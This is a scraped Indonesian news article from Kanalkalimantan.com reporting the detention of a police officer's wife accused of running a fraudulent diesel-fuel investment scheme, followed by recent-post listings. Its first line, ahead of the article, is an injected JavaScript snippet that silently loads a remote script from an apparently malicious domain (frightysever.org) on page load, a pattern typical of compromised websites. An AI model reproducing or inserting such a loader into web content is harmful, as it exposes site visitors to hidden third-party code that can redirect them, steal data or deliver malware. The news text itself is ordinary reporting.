(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kriminal

Tipu-tipu Investasi BBM Solar Istri Polisi di Banjarbaru Resmi Ditahan Polisi


KANALKALIMANTAN.COM, BANJARMASIN – Anggota Bhayangkari yang dilaporkan terkait kasus investasi bodong di Kota Banjarbaru, Provinsi Kalimantan Selatan, kini telah mendekam di balik jeruji besi rumah tahanan (Rutan) Polda Kalsel.

Foto FN ditahan tersebar di media sosial (medsos). Istri polisi itu nampak berdiri mengenakan jilbab hitam dan baju motif garis biru muda dan putih. Tangannya sambil memegang papan nama tahanan bertuliskan identitas dan pasal yang disangkakan kepadanya.

FN sendiri diketahui telah ditetapkan sebagai tersangka oleh penyidik Ditreskrimum Polda Kalsel pada 1 April 2023 lalu. Namun, FN tidak langsung dilakukan penahanan.

Baca juga: Terduga Maling Sepeda Motor Diringkus Warga di Jalan Trikora

Tersangka FN resmi ditahan oleh penyidik Polda Kalsel. Foto: ist

Kabar penahanan itu juga dikonfirmasi oleh Kabid Humas Polda Kalsel Kombes Pol Adam Erwindi. Penahanan untuk tersangka FN menurutnya telah dilakukan penyidik sejak Senin (22/4/2024).

“Kemarin pada hari Senin malam kita telah melakukan penahanan,” kata Kombes Adam kepada awak media, Selasa (23/4/2024) siang.

Mantan Wakapolres Metro Bekasi Polda Metro Jaya ini membeberkan tersangka FN sementara oleh penyidik dititipkan sebagai tahanan Dit Tahti Polda Kalsel di Banjarmasin.

Baca juga: Nyawa Lelaki di Banjarmasin Berakhir dalam Lilitan Ayunan Hammock

“Selanjutnya kita melengkapi pemberkasan untuk selanjutnya di tahap satukan kepada kejaksaan,” kata Kabid Humas.

Tersangka FN disangkakan melanggar pasal 378 jo pasal 372 Kitab Undang-Undang Hukum Pidana (KUHP) tentang Penipuan dan Penggelapan.

Kasus investasi bodong yang melibatkan anggota Bhayangkari di Kota Banjarbaru itu bermula ketika puluhan orang menggeruduk sebuah rumah yang merupakan tempat tinggal FN. Mereka ingin menanyakan dana investasi solar yang telah disetorkan kepada FN.

Setelah tak menerima kejelasan, para korban yang jumlahnya puluhan berbondong-bondong melaporkan FN ke Polda Kalsel.

Baca juga: Jelang Subuh, Jago Merah Hanguskan Dua Rumah di Bangkal

Tercatat tidak kurang 58 orang korban secara resmi membuat laporan ke Ditreskrimum Polda Kalsel terkait investasi BBM solar bodong yang dijalankan FN dengan kerugian mencapai Rp39 miliar.

Penyidik Ditreskrimum Polda Kalsel sebelumnya juga telah menyita sejumlah aset milik terlapor FN yang diduga terkait dengan bisnis investasi solar yang dijalankannya.

Aset tersebut diantaranya dua unit mobil tangki pengangkut BBM solar berukuran 5.000 liter, lalu ada mobil mewah merk Toyota Alphard dan sebuah mobil merk Brio milik terlapor. Empat aset bergerak tersebut kini telah terparkir di halaman Mapolda Kalsel di Kota Banjarmasin.(Kanalkalimantan.com/rizki)

Reporter: rizki
Editor: bie


Muhammad Andi

Recent Posts

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

53 menit ago

Hari Ini Masuk Asrama Haji, Kloter 1 Embarkasi Banjarmasin Berangkat Minggu

KANALKALIMANTAN.COM, BANJARBARU - Jelang kedatangan rombongan jemaah Haji Embarkasi Banjarmasin Kloter 1, Sabtu (11/5/2024), Petugas… Read More

1 jam ago

Paman Birin Trophy VII 2024 Digelar 15 Hari di Murdjani

KANALKALIMANTAN.COM, BANJARBARU - Gubernur Kalimantan Selatan H Sahbirin Noor membuka secara resmi Paman Birin Trophy… Read More

3 jam ago

Karst Sangkulirang-Mangkalihat dan Delta Mahakam, Bentang Alam yang Terancam Eksploitasi

KANALKALIMANTAN.COM, SAMARINDA - Akademisi Teknik Geologi Universitas Muhammadiyah Kalimantan Timur (UMKT) Syamsidar Sutan Malim Polawan… Read More

3 jam ago

Kunker DPRD Kapuas Perkaya Referensi Raperda Bangunan Gedung

KANALKALIMANTAN.COM, KUALA KAPUAS – Panitia Khusus (Pansus) I Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Kapuas… Read More

16 jam ago

Haul Dua Wali Allah di Cempaka yang Sangat Dermawan dan Hidup Sederhana

KANALKALIMANTAN.COM, BANJARBARU - Haul Syarifah Badrun Al Qadiri Al Hasani bin Sayyid Yusuf Al-Qadiri Al-Hasani… Read More

19 jam ago

This website uses cookies.